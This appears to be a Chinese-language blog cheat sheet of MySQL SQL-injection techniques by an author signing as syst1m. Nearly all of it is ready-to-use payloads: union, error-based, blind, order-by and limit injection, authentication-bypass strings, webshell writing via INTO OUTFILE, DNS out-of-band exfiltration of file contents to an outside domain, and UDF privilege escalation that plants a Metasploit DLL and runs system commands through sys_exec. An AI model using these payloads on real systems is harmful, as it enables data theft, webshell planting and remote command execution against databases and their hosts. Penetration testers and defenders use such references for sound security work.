MYSQL注入
函数
version()——MySQL 版本
user()——数据库用户名
database()——数据库名
@@datadir——数据库路径
@@version_compile_os——操作系统版本
information_schema 自带数据库
information_schema.schemata 数据库
information_schema.tables 数据表
information_schema.columns 数据列
floor函数返回小于等于该值的最大整数
RAND()函数调用可以在0和1之间产生一个随机数
join(连接)
联合注入
union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+
报错注入:
rand()
floor()
and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)
and (select count(*) from information_schema.tables group by concat(user(),floor(rand(0)*2))) -- +
1' and updatexml(1,user(),1) --+
只有在payload返回的不是xml格式才会生效,其最长输出32位
extractvalue(1,concat('~',user(),'~'))
其最长输出32位
简化
select count(*) from information_schema.tables group by concat(version(), floor(rand(0)*2))
关键表被禁用
select count(*) from (select 1 union select null union
select !1)a group by concat(version(),floor(rand(0)*2))
rand 禁用
select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)
exp
select exp(~(select * FROM(SELECT USER())a))
mysql重复性
select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
布尔注入
left(database(),1)>'s'
截取数据库第一位
ascii(substr((select table_name information_schema.tables where tables_schema =database()limit 0,1),1,1))=101 --+
substr(a,b,c) 从b位置开始,截取字符串a的c长度
ascii() 将某个字符转为ascii值
ascii(substr(select database()),1,1)=98
ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23
mid(a,b,c) 从位置b开始,街区a字符床的c位
ord()同ascii(),将字符串转为ascii值
regexp 正则注入
select user() regexp '^[a-z]';
select user() regexp '^ro'
I select * from users where id=1 and 1=(if((user() regexp '^r'),1,0));
select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1);
like 匹配注入
select user() like 'root%'
延时注入
If(ascii(substr(database(),1,1))>115,0,sleep(5))%23
UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘M SG’,’by 5 seconds’)),null) FROM (select database() as current) as tb1;
导入导出操作
load_file()导出文件
Select 1,2,3,4,5,6,7,hex(replace(load_file(char(99,58,92,119,105,110,100,111,119,115,92, 114,101,112,97,105,114,92,115,97,109)))
-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))
Explain:“char(99,58,47,98,111,111,116,46,105,110,105)”就是“c:/boot.ini”的 ASCII 代码
-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69) Explain:“c:/boot.ini”的 16 进制是“0x633a2f626f6f742e696e69”
-1 union select 1,1,1,load_file(c:\boot.ini) Explain:路径里的/用 \代替
Mysql False注入
==遇到引号闭合的变量时==
如果两个参数比较,有至少一个NULL,结果就是NULL,除了是用NULL<=>NULL 会返回1。不做类型转换
---------------------------------------------
两个参数都是字符串,按照字符串比较。不做类型转换
---------------------------------------------
两个参数都是整数,按照整数比较。不做类型转换
---------------------------------------------
如果不与数字进行比较,则将十六进制值视为二进制字符串。
---------------------------------------------
有一个参数是 TIMESTAMP 或 DATETIME,并且另外一个参数是常量,常量会被转换为时间戳
---------------------------------------------
有一个参数是 decimal 类型,如果另外一个参数是 decimal 或者整数,会将整数转换为 decimal 后进行比较,如果另外一个参数是浮点数,则会把 decimal 转换为浮点数进行比较
---------------------------------------------
所有其他情况下,两个参数都会被转换为浮点数再进行比较
---------------------------------------------
最后那一句话很重要,说明如果我是字符串和数字比较,需要将字符串转为浮点数,这很明显会转换失败
算数运算
- +
username= 'admin'+(payload)
– –
username ='admin'--(payload)
– *
username ='1abc'* (payload)
- /
username ='1abc'/ (payload)
1’-(ascii(mid((passwd)from(n)))=m)-’
正常的用法如下,对于str字符串,从pos作为索引值位置开始,返回截取len长度的子字符串
MID(str,pos,len)
这里的用法是,from(1)表示从第一个位置开始截取剩下的字符串,for(1)表示从改位置起一次就截取一个字符
mid((str)from(i))
mid((str)from(i)for(1))
位运算
- &
username='1abc'&(payload)
- | 或
- ^ 异或
- ‘<>0# 移位操作
###逻辑运算
– 不等于
username='admin'<>(payload)
- = 等于
username='admin'=(payload)
其他
'+1 is not null#
'in(-1,1)#
'not in(1,0)#
'like 1#
'REGEXP 1#
'BETWEEN 1 AND 1#
'div 1#
'xor 1#
'=round(0,1)='1
'<>ifnull(1,2)='1
Mysql 无列名注入
select * from users
select 1,2,3 union select * from users;
select `2` from (select 1,2,3 union select * from users)redforce;
select * from users where id=-1 union select 1,(select concat(`2`,0x3a,`3`) from (select 1,2,3 union select * from users)a limit 1,1),3;
查询几个字段数目
select * from (select 1)a,(select 2)b,(select 3 )c union select * from users
Mysql order by 注入
union 注入
select * from users
select * from users union select 1,2,3 order by 3
select * from users union select 1,2,'admin' order by 3
select * from users union select 1,2,'adminaa' order by 3
if盲注
- 需要知道列名
order by if(1=1,id,username)
- 不需要知道列名
order by if(表达式,1,(select id from information_schema.tables))
==如果表达式为false时,sql语句会报ERROR 1242 (21000): Subquery returns more than 1 row的错误,导致查询内容为空,如果表达式为true是,则会返回正常的页面。==
基于时间的盲注
order by if(1=1,1,sleep(1))
基于rand()的盲注
select * from ha order by rand(true)
mysql> select * from ha order by rand(true);
+—-+——+
| id | name |
+—-+——+
| 9 | NULL |
| 6 | NULL |
| 5 | NULL |
| 1 | dss |
| 0 | dasd |
+—-+——+
mysql> select * from ha order by rand(false);
+—-+——+
| id | name |
+—-+——+
| 1 | dss |
| 6 | NULL |
| 0 | dasd |
| 5 | NULL |
| 9 | NULL |
+—-+——+
order by rand(ascii(mid((select database()),1,1))>96)
步骤
- 判断
http://192.168.239.2:81/?order=IF(1=1,name,price) 通过name字段排序
http://192.168.239.2:81/?order=IF(1=2,name,price) 通过price字段排序
/?order=(CASE+WHEN+(1=1)+THEN+name+ELSE+price+END) 通过name字段排序
/?order=(CASE+WHEN+(1=1)+THEN+name+ELSE+price+END) 通过price字段排序
http://192.168.239.2:81/?order=IFNULL(NULL,price) 通过name字段排序
http://192.168.239.2:81/?order=IFNULL(NULL,name) 通过price字段排序
可以观测到排序的结果不一样
http://192.168.239.2:81/?order=rand(1=1)
http://192.168.239.2:81/?order=rand(1=2)
/?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x67,1,0x00)) 正确
/?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x66,1,0x00)) 错误
regexp 用前面的1和后面的返回结果比较
https://www.cnblogs.com/icez/p/Mysql-Order-By-Injection-Summary.html
limit 注入
不存在order by 关键字
select id from users limit 0,1
select id from users limit 0,1 union select username from users;
存在 order by 关键字(无法使用union select)
此方法适用于5.0.0< MySQL <5.6.6版本
PROCEDURE函数
- 报错注入
select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
- 延时注入
select * from admin where id >0 order by id limit 0,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(1=1,benchmark(2000000,md5(404)),1)))),1);
报错注入邂逅load_file&into outfile搭讪LINES
FIELDS TERMINATED BY原理为在输出数据的每个字段之间插入webshell内容,所以如果select返回的只有一个字段,则写入的文件不包含webshell内容,例如下面语句SELECT username FROM user WHERE id = 1 into outfile 'D:/1.php' FIELDS TERMINATED BY 0x3c3f70687020706870696e666f28293b3f3e,写入的文件中只包含username的值而没有webshell内容;
LINES TERMINATED BY和LINES STARTING BY原理为在输出每条记录的结尾或开始处插入webshell内容,所以即使只查询一个字段也可以写入webshell内容,更为通用。此外,该类方式可以引用于limit等不能union的语句之后进行写文件操作。
into outfile 写文件
- union写文件
SELECT * FROM user WHERE id = -1 union select 1,2,0x3c3f70687020706870696e666f28293b3f3e into outfile 'D:/1.php'
- FIELDS TERMINATED BY(可在limit等语句后)
SELECT * FROM user WHERE id = 1 into outfile 'D:/1.php' fields terminated by 0x3c3f70687020706870696e666f28293b3f3e
- LINES TERMINATED BY(可用于limit等sql注入)
SELECT username FROM user WHERE id = 1 into outfile 'D:/1.php' LINES TERMINATED BY 0x3c3f70687020706870696e666f28293b3f3e
- LINES STARTING BY(可用于limit等sql注入)
SELECT username FROM user WHERE id = 1 into outfile 'D:/2.php' LINES STARTING BY 0x3c3f70687020706870696e666f28293b3f3e
###Load_file 读文件
- 联合注入+load_file读文件
SELECT * FROM user WHERE id=-1 UNION select 1,'1',(select load_file('D:/1.php'))
- DNSLOG带外查询
SELECT id FROM user WHERE id = load_file (concat('\\',hex((select load_file('D:/1.php'))),'.t00ls.xxxxxxxxx.tu4.org\a.txt'))
- 报错注入+load_file读文件
select * from user where username = '' and updatexml(0,concat(0x7e,(LOAD_FILE('D:/1.php')),0x7e),0)
select * from user where id=1 and (extractvalue(1,concat(0x7e,(select (LOAD_FILE('D:/1.php'))),0x7e)))
扫描文件是否存在
load_file读取文件时,如果没有对应的权限获取或者文件不存在则函数返回NULL,所以结合isnull+load_file可以扫描判断文件名是否存在
- 如果文件存在,isnull(load_file(‘文件名’))返回0
mysql> select * from user where username = '' and updatexml(0,concat(0x7e,isnull(LOAD_FILE('D:/1.php')),0x7e),0);
ERROR 1105 (HY000): XPATH syntax error: '~0~'
- 如果文件不存在isnull(load_file(‘文件名’))返回1
mysql> select * from user where username = '' and updatexml(0,concat(0x7e,isnull(LOAD_FILE('D:/xxxxx')),0x7e),0);
ERROR 1105 (HY000): XPATH syntax error: '~1~'
另类写文件
SELECT ... INTO DUMPFILE'file_path'
笛卡尔积延时注入
SELECT count(*) FROM information_schema.columns A;
SELECT count(*) FROM information_schema.columns A,information_schema.columns B,information_schema.columns C;
Insert、update注入新思路
– 字符串《==》数字
conv() 进制转换
- 获取的数据超过8个字节
select conv(hex(substr(user(),1 + (n-1) * 8, 8 * n)), 16, 10);
- 获取表名
select conv(hex(substr((select table_name from information_schema.tables where table_schema=schema() limit 0,1),1 + (n-1) * 8, 8*n)), 16, 10);
- 获取列名
select conv(hex(substr((select column_name from information_schema.columns where table_name=’Name of your table’ limit 0,1),1 + (n-1) * 8, 8*n)), 16, 10);
- 利用update语句
update users set username = 'test' | conv(hex(substr(user(),1 + (n-1) * 8, 8 * n)), 16, 10) where id =16
- 利用 INSERT语句
insert into users values (17,'james', 'bond');
insert into users values (17,'james', 'bond'|conv(hex(substr(user(),1 + (n-1) * 8, 8* n)),16, 10);
- Mysql 5.7中的限制
update users set username = '0' | conv(hex(substr(user(),1 + (n-1) * 8, 8 * n)), 16, 10) where id =16
- 编码解码
conv(hex(value, 16, 10)
select unhex(conv(value, 10, 16));
mysql大整数溢出报错
- 获取表名
!(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x)-~0
- 获取列名
select !(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x)-~0;
- 检索数据
!(select*from(select concat_ws(':',id, username, password) from users limit 0,1)x)-~0;
- 一次获取全部表与列
!(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()[email protected]:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)-~0
(select(!x-~0)from(select(concat (@:=0,(select count(*)from`information_schema`.columns where table_schema=database()[email protected]:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a)
(select!x-~0.from(select(concat (@:=0,(select count(*)from`information_schema`.columns where table_schema=database()[email protected]:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a)
MD5哈希注入
- 代码中语句
$sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'";
如果可选的 raw_output 被设置为 TRUE,那么 MD5 报文摘要将以16字节长度的原始二进制格式返回。
ffifdyop --> 'or'
esvh --> '='
129581926211651571912466741651878684928 --> 'or'
https://bbs.ichunqiu.com/article-1766-1.html
show columns 注入
- php代码
mysql_query("show columns from `shop_{$table}`") or die("show coulumns 出错:".mysql_error());
show columns
- 注入
table=123` where updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)#
MySQL数据库的Innodb引擎的注入
当目标程序过滤了关键字,如information,在注入时,使用select database()关键字查询出当前库名后,无法通过查询information_schema.tables表查询当前库的表名
- Innodb 的表
mysql.innodb_table_stats
mysql.innodb_index_stats
- 字段
database_name , table_name
- 例子:
group_concat(table_name) from mysql.innodb_table_stats where database_name =database() #
Mysql约束攻击
- 参考
http://www.goodwaf.com/2016/12/30/%E5%9F%BA%E4%BA%8E%E7%BA%A6%E6%9D%9F%E6%9D%A1%E4%BB%B6%E7%9A%84SQL%E6%94%BB%E5%87%BB/
- 条件限制
服务端没有对用户名长度进行限制
登陆验证的SQL语句必须是用户名和密码一起验证
验证成功后返回的必须是用户传递进来的用户名,而不是从数据库取出的用户名
- 攻击原理
INSERT截断:当设计一个字段时,我们都必须对其设定一个最大长度,比如CHAR(10),VARCHAR(20)等等。但是当实际插入数据的长度超过限制时,数据库就会将其进行截断,只保留限定的长度。
在数据库对字符串进行比较时,如果两个字符串的长度不一样,则会将较短的字符串末尾填充空格,使两个字符串的长度一致,比如,字符串A:[String]和字符串B:[String2]进行比较时,由于String2比String多了一个字符串,这时MySQL会将字符串A填充为[String ],即在原来字符串后面加了一个空格,使两个字符串长度一致。
- 服务端代码
0){
return $username;//此处较原文有改动
}
}
return Null;
?>
- 攻击
注册一个[Dumb done]的用户
MySQL列名重复 报错
- Example
select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
- join函数爆列名
select * from(select * from users a join users b)c;
select * from(select * from users a join users b using(id))c;
- 爆数据
select * from (select * from users a join users b using(id,username,password))c;
- 关于 join参考
http://wxb.github.io/2016/12/15/MySQL%E4%B8%AD%E7%9A%84%E5%90%84%E7%A7%8Djoin.html
MySQL UDF Exploitation
select host, user, password from mysql.user;
select * from mysql.user where user = substring_index(user(), '@', 1) ;
- dll下载地址
https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql
- 获取当前操作系统以及数据库架构情况
select @@version_compile_os, @@version_compile_machine
show variables like '%compile%';
- 查找plugin文件夹
MySQL 5.0.67以后udf.dll必须位于plugin文件夹
select @@plugin_dir ;
show variables like 'plugin%';
- 旧版本可以使用目录
@@datadir
@@basedirbin
C:windows
C:windowssystem
C:windowssystem32
上传二进制文件
- 网络共享
select load_file('\\192.168.0.19\network\lib_mysqludf_sys_64.dll') into dumpfile "D:\MySQL\mysql-5.7.21-winx64\mysql-5.7.21-winx64\lib\plugin\udf.dll";
- 十六进制编码
select hex(load_file('/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll')) into dumpfile '/tmp/udf.hex';
select 0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000… into dump file "D:\MySQL\mysql-5.7.21-winx64\mysql-5.7.21-winx64\lib\plugin\udf.dll";
- 创建表拼接
create table temp(data longblob);
insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000000000000000000);
update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b377a382b35ba383b369f10ab376a383b369f116b375a383b369f111b376a383b369f112b376a383b35269636877a383b300000000000000000000000000000000504500006486060070b1834b00000000);
select data from temp into dump file "D:\MySQL\mysql-5.7.21-winx64\mysql-5.7.21-winx64\lib\plugin\udf.dll";
- MySQL 5.6.1/MariaDB 10.0.5
to_base64和from_base64函数
select to_base64(load_file('/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll'))
into dumpfile '/tmp/udf.b64';
编辑base64文件并通过以下方式将其dump到插件目录
select from_base64("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAAzwu3gd6ODs3ejg7N3o4OzafEQs3Wjg7Np8QCzfaODs2nxB7N1o4OzUGX4
s3Sjg7N3o4KzW6ODs2nxCrN2o4OzafEWs3Wjg7Np8RGzdqODs2nxErN2o4OzUmljaHejg7MAAAAA
AAAAAAAAAAAAAAAAUEUAAGSGBgBwsYNLAAAAAAAAAADwACIgCwIJAAASAAAAFgAAAAAAADQaAAAA
EAAAAAAAgAEAAAAAEAAAAAIAAAUAAgAAAAAABQACAAAAAAAAgAAAAAQAADPOAAACAEABAAAQAAAA
AAAAEAAAAAAAAAAAEAAAAAAAABAAAAAAAAAAAAAAEAAAAAA5AAAFAgAAQDQAADwAAAAAYAAAsAIA
AABQAABoAQAAAAAAAAAAAAAAcAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAwAABwAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAAR
EAAAABAAAAASAAAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAABQsAAAAwAAAADAAAABYAAAAA")
into dumpfile "D:\MySQL\mysql-5.7.21-winx64\mysql-5.7.21-winx64\lib\plugin\udf.dll";
DLL使用
- 查找到mysql的目录
select @@basedir;
- 创建文件夹(没测试成功)
select 'It is dll' into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib::$INDEX_ALLOCATION'; //利用NTFS ADS创建lib目录
select 'It is dll' into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin::$INDEX_ALLOCATION'; //利用NTFS ADS创建plugin目录
- 改变plugin目录位置
mysqld.exe –plugin-dir=C:\temp\plugins\
- 上传dll
- 安装
create function sys_exec returns int soname 'udf.dll';
- 验证
select * from mysql.func where name = 'sys_exec';
- 删除
drop function sys_exec;
- 执行
select sys_exec('cmd');
原创文章,作者:syst1m,未经授权禁止转载!如若转载,请联系作者:syst1m
syst1m 
微信扫一扫 
支付宝扫一扫 
